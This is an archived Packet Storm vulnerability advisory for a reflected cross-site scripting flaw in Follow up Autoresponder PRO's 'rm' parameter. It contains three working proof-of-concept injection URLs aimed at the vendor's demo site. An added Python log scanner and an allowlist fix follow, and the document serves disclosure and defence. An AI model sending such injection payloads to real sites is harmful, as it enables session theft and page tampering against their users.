Autoresponder PRO Cross Site Scripting

2014-01-20T00:00:00
ID PACKETSTORM:124853
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2014-01-20T00:00:00

Description

                                        
[+] Author: TUNISIAN CYBER  
[+] Exploit Title: Follow up Autoresponder PRO Cross Site Scripting vulnerability  
[+] Date: 09-01-2014  
[+] Category: WebApp  
[+] Google Dork: :  
[+] Tested on: KaliLinux  
[+] Vendor: http://www.scripts4webmasters.com/  
[+] Friendly Sites: na3il.com,th3-creative.com  
###############################################################  
+Description:  
Web based php/mysql email list management software where you can get subscriber names, email addresses to do contact management email marketing.  
  
+Exploit:  
Follow up Autoresponder PRO suffers from a Cross Site Scripting vulnerability in the rm query parameter, as the PoC URLs below show.  
  
+PoC:(Tested on Demo)  
http://www.scripts4webmasters.com/arppro-demo/?rm=send_login_info'%22()%26%25<ScRiPt%20>prompt(986987)</ScRiPt>  
http://www.scripts4webmasters.com/arppro-demo/?rm=license'%22()%26%25<ScRiPt%20>prompt(941203)</ScRiPt>  
http://www.scripts4webmasters.com/arppro-demo/?rm=send_login_info'%22()%26%25<ScRiPt%20>prompt(918540)</ScRiPt>  
  
########################################################################################  
Greets to: XMaX-tn, N43il HacK3r, XtechSEt  
Sec4Ever Members:  
DamaneDz  
UzunDz  
GEOIX  
########################################################################################  
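A defender-side check for the request pattern in the PoC above, as an added example that is not part of the original advisory: it scans web access log lines and flags requests whose rm parameter decodes to anything other than a plain action name. The log lines are constructed samples, and the rule that legitimate rm values contain only letters, digits and underscores is an assumption based on the two values seen in the PoC (send_login_info, license).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate rm value is a short action name made of
# letters, digits and underscores, like the two seen in the advisory.
SAFE_RM = re.compile(r"[A-Za-z0-9_]{1,64}")

# Request line as it appears in common/combined access log format.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jan/2014:10:00:01 +0000] '
    '"GET /arppro-demo/?rm=license HTTP/1.1" 200 5120',
    '192.0.2.44 - - [20/Jan/2014:10:00:07 +0000] '
    '"GET /arppro-demo/?rm=license\'%22()%26%25%3CScRiPt%20%3E'
    'prompt(941203)%3C/ScRiPt%3E HTTP/1.1" 200 5388',
    '192.0.2.10 - - [20/Jan/2014:10:00:09 +0000] '
    '"GET /arppro-demo/index.php HTTP/1.1" 200 4096',
]


def suspicious_rm(request_target):
    """Return the decoded rm value if it is not a plain action name, else None."""
    query = urlsplit(request_target).query
    # parse_qsl percent-decodes each value once, so %3C is seen as "<".
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == "rm" and not SAFE_RM.fullmatch(value):
            return value
    return None


def scan(log_lines):
    """Return (line_number, decoded_rm) for every flagged request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            value = suspicious_rm(match.group(1))
            if value is not None:
                hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: unexpected rm value {value!r}")
```

The same allowlist is the natural server-side fix: reject any rm value that is not a known action name, and HTML-encode the value wherever it is echoed into a page.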